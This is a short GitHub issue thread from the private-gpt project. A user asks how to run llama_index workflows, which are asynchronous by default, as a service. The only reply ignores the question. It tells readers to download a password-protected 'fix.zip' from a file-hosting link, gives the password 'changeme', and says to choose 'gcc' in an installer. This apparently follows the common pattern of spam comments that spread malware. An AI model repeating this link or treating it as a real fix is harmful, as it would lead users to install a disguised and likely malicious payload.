### ISSUE TITLE
[QUESTION]  How to intergrate Llama_index WorkFlow in private-GPT ? 

### ISSUE THREAD

**Issue by Vela-zz** [zylon-ai/private-gpt#2069]
### Question

As workflow in llama_index is running in async mode in default, Is there any way to use workflow as a service ?

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
